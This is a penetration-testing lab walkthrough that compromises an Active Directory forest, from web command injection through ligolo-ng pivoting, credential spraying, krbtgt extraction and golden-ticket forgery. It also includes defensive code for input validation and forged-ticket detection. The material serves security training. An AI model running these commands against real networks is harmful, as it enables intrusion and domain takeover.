CRTA Labs Notes and Writeups.

Scope Access

VPN: 10.10.200.0/24

External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]

Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]

Initial Access

Scanning Available Host

nmap -sn 192.168.80.0/24

PS: If you cannot discover the IPs, the server may have temporary ping blocking enabled. You can specifically scan the following IPs.

We can see 1 host up; let's scan 192.168.80.10

nmap -sC -sV 192.168.80.10

© All Rights Reserved CyberWarFare Labs

We can see port 80 open, so let's visit the website.
There we can see a signup link; we can try signing up for a new account to see whether it works.

We signed up with a random username and password, and logging in with them got us into the dashboard.
Then we intercepted some of the traffic from the website; one interesting field that we found was the newsletter email field.

We found command execution in the email field.
Let's try to dump critical files such as /etc/passwd.
There we found the “privilege” user with its credential:
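The injection in the newsletter field works because the submitted address reaches a shell as part of a command string. The following is an added example, not the lab application's code: a constructed handler showing that pattern beside two hardened forms (allow-list validation with an argv list, and simply not shelling out); the helper path and subscriber file name are assumptions.

```python
import re
from pathlib import Path

# Strict shape for a plain address: local part, one '@', dotted domain. Shell
# metacharacters (; | & $ ` ( ) < > newline) are simply not in the alphabet.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def build_command_vulnerable(email: str) -> str:
    """The bug class found in the lab: untrusted input interpolated into a string
    that is later run with shell=True, so 'x@y.com; cat /etc/passwd' runs cat."""
    return f"echo {email} >> /var/lib/newsletter/subscribers.txt"


def validate_email(email: str) -> str:
    """Allow-list check; returns the address unchanged or raises ValueError."""
    if not EMAIL_RE.fullmatch(email):
        raise ValueError(f"rejected e-mail address: {email!r}")
    return email


def build_command_safe(email: str) -> list:
    """argv list for subprocess.run(argv) with shell=False: no shell ever parses
    the address, so metacharacters stay inside one argument. Validation runs
    first so junk never reaches the helper (hypothetical path) at all."""
    return ["/usr/local/bin/add-subscriber", "--", validate_email(email)]


def subscribe(email: str, subscribers: str) -> int:
    """Preferred fix: do the work in-process and spawn nothing. Appends the
    validated address to the file and returns the subscriber count."""
    path = Path(subscribers)
    with path.open("a", encoding="utf-8") as fh:
        fh.write(validate_email(email) + "\n")
    return len(path.read_text(encoding="utf-8").splitlines())


if __name__ == "__main__":
    payload = "user@example.com; cat /etc/passwd"  # constructed tester input
    print("shell sees:", build_command_vulnerable(payload))
    try:
        build_command_safe(payload)
    except ValueError as exc:
        print(exc)
```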

Let's SSH into the machine with the credentials discovered in the “/etc/passwd” file.
ssh privilege@192.168.80.10
The credential was correct; we got initial access on the machine.

Enumeration
Enumerating the machine gives a few leads to move forward.
We saw this machine also has another adapter, connected to a different network.
Now let's search for browser history / bookmarks; it has been found that the machine has Mozilla Firefox installed.
ls -la .mozilla/
cd .mozilla/firefox/
# The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release
We will use sqlite3 to access the Firefox database as follows:
sqlite3 places.sqlite
.tables
select * from moz_bookmarks;
We found some interesting credentials in the Mozilla bookmarks database.

Bookmark:
We have to perform pivoting as 192.168.98.0/24 is not directly accessible from the VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz
#Agent
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz
Set up the ligolo-ng proxy on the attacker machine & the ligolo-ng agent on the victim machine.
# Attacker Machine
sudo ip tuntap add user <your_user> mode tun ligolo

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :
sudo ip route del 192.168.98.0/24 dev tun0
#Up the ligolo interface :
sudo ip link set ligolo up
#Add 192.168.98.0/24 IP range to the ligolo interface :
sudo ip route add 192.168.98.0/24 dev ligolo
Confirm the route on your attacker machine. The internal IP range is now added to the routing table.
Start the proxy on the attacker server:
./proxy -selfcert -laddr 0.0.0.0:443
Transfer the agent to the victim machine & start the connection:
#Replace this with your attacker IP address.
./agent -connect 10.10.200.X:443 -ignore-cert
On the server side, we can check that the agent connected successfully.

On the ligolo-ng proxy, check the session & start the tunnel.
session
list_tunnels
start
Now, fire up a new terminal & check that we can now access the internal IP range 192.168.98.0/24.

Initial Access
Let's first scan for the available hosts in the internal network [192.168.98.0/24]. We can see three hosts are up with nmap:
nmap -sn 192.168.98.0/24
Let's spray the discovered credentials across the network using the crackmapexec toolkit.
#Create a txt file with live hosts in the 192.168.98.0/24 network :
cat target.txt
192.168.98.2
192.168.98.15
192.168.98.30
192.168.98.120

#Now, use cme to spray the credentials :
crackmapexec --verbose smb target.txt -u john -p 'User1@#$%6'
Great! It seems that the user “John” is a local administrator on the “192.168.98.30” machine, whose name is “MGMT”.
Now, let's dump the LSA secrets using the crackmapexec toolkit, which utilizes impacket's secretsdump module for the same.
crackmapexec --verbose smb 192.168.98.30 -u john -p 'User1@#$%6' --lsa
Sweet!! Got the clear-text credentials of the user “corpmngr”.
Again, let's spray the credentials across the network using the crackmapexec toolkit.

# Spray again in the network with the new credentials :
crackmapexec --verbose smb target.txt -u corpmngr -p 'User4&*&*'
Awesome, we got the credentials working as local administrator on the “CDC” machine at “192.168.98.120”.
Since we know the machine name & the domain, let's update the same in our hosts file.
sudo nano /etc/hosts
192.168.98.2 warfare.corp dc01.warfare.corp
192.168.98.120 child.warfare.corp cdc.child.warfare.corp
We are local administrator on the Child Domain Controller. Let's extract the hash of the “krbtgt” account using the impacket secretsdump script. We will forge a golden ticket to compromise the Parent Domain Controller.
secretsdump.py -debug child/corpmngr:'User4&*&*'@cdc.child.warfare.corp -just-dc-user 'child\krbtgt'
#Results :
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e57dd34c1871b7a23fb17a77dec9b900
krbtgt:aes256-cts-hmac-sha1-96:ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2

We will perform SID extraction using the lookupsid python script.
lookupsid.py child/corpmngr:'User4&*&*'@child.warfare.corp
lookupsid.py child/corpmngr:'User4&*&*'@warfare.corp
So far we have got the following details:

#Result :
1. krbtgt aes256 Hash
ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2
2. Parent SID : S-1-5-21-3375883379-808943238-3239386119
3. Child SID : S-1-5-21-3754860944-83624914-1883974761
We will forge a golden ticket using ticketer as follows:
ticketer.py -domain child.warfare.corp -aesKey ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2 -domain-sid S-1-5-21-3754860944-83624914-1883974761 -groups 516 -user-id 1106 -extra-sid S-1-5-21-3375883379-808943238-3239386119-516,S-1-5-9 'corpmngr'
Let's set the ccache file in the environment variable.
export KRB5CCNAME=corpmngr.ccache
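From the defender's side, the ticket above is recognisable by its SID set: a child-domain user account carrying Domain Controllers of the parent and Enterprise Domain Controllers, which SID filtering strips on an external trust but not inside a forest. The following is an added example, not part of the lab material: a check over constructed logon records, where the domain SIDs are the ones recovered with lookupsid above and the record format (and a group-membership source such as Event ID 4627) is an assumption.

```python
import re

# Domain SIDs recovered with lookupsid in the lab: SID -> domain name.
FOREST_DOMAINS = {
    "S-1-5-21-3375883379-808943238-3239386119": "warfare.corp",
    "S-1-5-21-3754860944-83624914-1883974761": "child.warfare.corp",
}
# Well-known privileged RIDs; none should arrive from a domain other than the account's own.
PRIVILEGED_RIDS = {512: "Domain Admins", 516: "Domain Controllers",
                   518: "Schema Admins", 519: "Enterprise Admins"}
ENTERPRISE_DCS = "S-1-5-9"  # well-known SID: Enterprise Domain Controllers
DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

def split_sid(sid):
    """(domain_sid, rid) for an S-1-5-21 SID, (None, None) for well-known SIDs."""
    m = DOMAIN_SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else (None, None)

def suspicious_sids(account, account_sid, token_sids):
    """Findings for one logon's SID set; an empty list means it looks ordinary.
    Rule 1: a privileged RID from another domain of the forest, the shape -extra-sid
    produces and which an intra-forest trust does not filter. Rule 2: Domain
    Controllers (RID 516) or S-1-5-9 on anything but a computer account."""
    home, _ = split_sid(account_sid)
    is_machine = account.endswith("$")  # computer accounts end in '$'
    findings = []
    for sid in token_sids:
        dom, rid = split_sid(sid)
        if dom in FOREST_DOMAINS and dom != home and rid in PRIVILEGED_RIDS:
            findings.append(f"{PRIVILEGED_RIDS[rid]} of {FOREST_DOMAINS[dom]} on {account}")
        if not is_machine and (rid == 516 or sid == ENTERPRISE_DCS):
            findings.append(f"domain-controller SID {sid} on user account {account}")
    return findings

# Constructed records: an ordinary child-domain admin logon, then the SID set
# the forged ticket above would present to the parent DC.
CHILD = "S-1-5-21-3754860944-83624914-1883974761"
PARENT = "S-1-5-21-3375883379-808943238-3239386119"
LOGONS = [
    {"account": "CHILD\\corpmngr", "account_sid": f"{CHILD}-1106",
     "sids": [f"{CHILD}-513", f"{CHILD}-512"]},
    {"account": "CHILD\\corpmngr", "account_sid": f"{CHILD}-1106",
     "sids": [f"{CHILD}-516", f"{PARENT}-516", ENTERPRISE_DCS]},
]

if __name__ == "__main__":
    for i, r in enumerate(LOGONS):
        print(f"logon {i}:", suspicious_sids(r["account"], r["account_sid"], r["sids"]))
```

Only the second record is flagged; a child DC's own computer account holding RID 516 and S-1-5-9 passes, which is the distinction that makes the heuristic usable on real logon telemetry.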

Request a Service Ticket using the ccache file.
getST.py -spn 'CIFS/dc01.warfare.corp' -k -no-pass child.warfare.corp/corpmngr -debug
export KRB5CCNAME=corpmngr@CIFS_dc01.warfare.corp@WARFARE.CORP.ccache
Parent Domain Controller
We got the CIFS ticket for the Domain Controller as “corpmngr”; let's extract the Administrator hash using the secretsdump script.
secretsdump.py -k -no-pass dc01.warfare.corp -just-dc-user 'warfare\Administrator' -debug

Let's use the Administrator credentials to access the Domain Controller:
psexec.py -debug 'warfare/Administrator@dc01.warfare.corp' -hashes aad3b435b51404eeaad3b435b51404ee:a2f7b77b62cd97161e18be2ffcfdfd60
If you like the practice lab, please give us a shoutout. Also, once you are ready, feel free to drop an email to the support team (support@cyberwarfare.live) providing your availability in British Summer Time (BST) in date & time format.

 
